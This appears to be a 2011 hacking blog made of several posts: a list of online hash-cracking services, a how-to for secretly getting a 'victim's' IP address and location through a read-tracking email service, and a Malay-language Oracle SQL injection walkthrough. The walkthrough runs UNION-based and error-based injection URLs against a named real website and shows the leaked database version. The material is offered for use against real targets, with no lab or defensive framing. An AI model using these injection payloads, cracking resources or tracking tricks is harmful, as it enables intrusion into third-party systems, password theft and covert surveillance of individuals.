Thursday, December 22, 2011

Cracking Hash : List of Web

MD5 Cracker Web List

Just wanna share with you guys. A list of web/services for cracking a md5 hash.
Check it out. r0x d4 n3tw0rk

- md5gle.com

- online md5 cracker,md5 reverse, md5 decrypt (457,354,352,282)

- md5Crack.com | online md5 cracker

- [ md5 crack password crack hash checker ]

- md5cracker.tk (MD5 Search engine by searches a total of 14 on-line crackers.)

- Index of / (5,889,729)

- AP3 Designs

- http://md5-db.com (The database is approximately 70gb)

- md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com (56,502,235)

- GData: An Online MD5 Hash Database (3,251,106)

- TMTO[dot]ORG (306.000.000.000)

- milw0rm.com - free md5/lm hash cracking (Milw0rm Cracker db)

- BlackLight's hash cracker (2,456,288)

- .:Shell-Storm.org:. | DataBase MD5 | ( The data base currently contains 169582 passwords )

- Parallels Confixx (Need Account)

- Passwords recovery - MD5, SHA1, MySQL (Register to increase your priority)

- md5ÔÚÏß²éѯÆƽâ|md5½âÃÜ|md5¼ÓÃÜ|salt

- Hashkiller.com

- plain-text.info

- insidepro.com

- md5decrypter.co.uk

- c0llision.net

- md5pass.info

- hashcrack.com

- generuj.pl

- authsecu.com

- md5decryption.com

- chwett.com/md5

- md5this.com

- tmto.org

- kerinci.net

- hash.db.hk

- crackfor.me

- md5hood.com

- neofusion.de

- md5.shalla.de

- md5.my-addr.com

- hashcracking.info <-- API: https://hashcracking.info/check.php?hash= {hash}

- md5.opencracking.info

- md5online.net

- macrosoftware.ro/md5

- netmd5crack.com

- bokehman.com

- hash-database.net

- thoran.eu

- md5-database.net

- web-security-services.com

- bitdelivery.net



-----------------------------------------------------------------
CRACKED PASSWORD LIST
-----------------------------------------------------------------
www.md5oogle.com
[ md5 crack password crack hash checker ]
milw0rm.com - free md5/lm hash cracking
darkc0de.com [ index ]

-----------------------------------------------------------------
MULTI
-----------------------------------------------------------------
md5cracker.org
md5.igrkio.info
hashkiller.com
hashchecker.de
sinhalayo159.07x.net


-----------------------------------------------------------------
IRC
-----------------------------------------------------------------
plain-text.info (irc.Plain-Text.info #rainbowcrack |||| irc.rizon.net #rainbowcrack)
md5.overclock.ch (irc.rizon.net #md5)
c0llision.net (irc.after-all.org #md5crack |||| ircd.hopto.org #md5crack)



-----------------------------------------------------------------
ICQ
-----------------------------------------------------------------
c0llision.net (427-921-047) <- md5, ntlm
hashkiller.com (405-701-776) <- md5



-----------------------------------------------------------------
LM
-----------------------------------------------------------------
lmcrack.com
plain-text.info


-----------------------------------------------------------------
NTLM
-----------------------------------------------------------------
plain-text.info
md5decrypter.co.uk


-----------------------------------------------------------------
SHA1
-----------------------------------------------------------------
md5.rednoize.com
hash.db.hk
md5decrypter.co.uk


-----------------------------------------------------------------
SHA256
-----------------------------------------------------------------
md5.shalla.de
hash.db.hk


-----------------------------------------------------------------
RAINBOW TABLE
-----------------------------------------------------------------
Free Rainbow Tables » Distributed Rainbow Cracking » LM, NTLM, MD5, SHA1, HALFLMCHALL, MSCACHE
Rainbow Tables . net


Sunday, November 27, 2011

Track IP using email

Track IP using email

Track IP using email - article asal dari Iniseni
This time i will explained how to track IP address with advanced method. By using method you can get the IP address,location, timing of victim.


How to track IP address?
step 1:
know what is your victim email id.
For eg:
victimid[@]gmail.com

step 2:
Register an account here: http://www.readnotify.com


step 3:
send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.
For eg:
victimid[@]gmail.com.readnotify.com


step 4:
if victim opens the mail, his info will be tracked(IP address) and mailed to your account.

Now u get the IP..he just got pwned by you!!iniseni


Tuesday, November 22, 2011

#./ro0t3r.sh: SQLi Filter bypass WAF

#./ro0t3r.sh: SQLi Filter bypass WAF: This is SQLi evasion filter.. that used to bypass WAF (Web Application Firewall) filter for some string,char,byte,operator and others... ...


Wednesday, November 16, 2011

#./ro0t3r.sh: Hash Type

#./ro0t3r.sh: Hash Type: For you guys as refferer Sharing is caring.. kekeke ES(Unix) IvS7aeT4NzQPM Domain Cached Credentials Admin:b474d48cdfc4974d86e f4d249...

For more visi t#./ro0t3r.sh


Monday, May 30, 2011

Oracle Database Injection


So we gonna play with Oracle Database Injection
our target :
http://www3.inn.cl
First using Union Based injection

1 - Kita mulakan check vuln dgn letak single quote '
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
jika ade vuln,ia akan keluarkan error :
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
Kita dapat lihat ORA-01756,dan dgn segera tahulah ini oracle injection kn?


2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error
dan dari web ni,column yg ade = 9
3 - so kita teruskan dgn union injection kita
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
jika di sini tiada nombor column yg error  kluar..So kita lihat error dia.
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6

FROM keyword not found,bermaksud injection ni kita perlukan FROM. 
Utk rujukan :
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/

Sebelum tu,kita perlukan null kan dulu semua nombor column sama mcm dlm posgresql injection.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--

Dan utk mudahkan kita nk tau column mane bleh diinjek,tukarkan null kepada 0 satu demi satu.
dalam kes ni,column null pertama lepas letak 0 takde error,tp error wujud kalau pada column ke 2.
ini bermaksud,column kedua tu kita leh inject


4 - dlm tutorial nih kita just inject and extrac sampai version() je yer,yg lain2 korang test sdri GayFace
dari pentestmonkey,kita tgk ade 3 syntax utk cek version
Quote:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


so kita just amik yg 1st sbg testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:Oracle Database 10g Release 10.2.0.1.0 - 64bit Production
Image has been scaled down 22% (800x429). Click this bar to view original image (1022x547). Click image to open in new window.




So..dah berjaya... Smile
----------------------------------------------------------------------------------------------------------
 Kalau Error Base..kita biasa guna or 1=1 /or 1=2
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
function utl_inaddr.get_host_address hanya boleh digunakan kalau
oracle itu adalah version 10g ke bawah..kalau yg 11g kita perlu gunakan

Code:
1=ctxsys.drithsx.sn(1,(sql syntax))


Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6
[Image: 41004395321842115849.png]


Credit to : p0pc0rn @tbd.my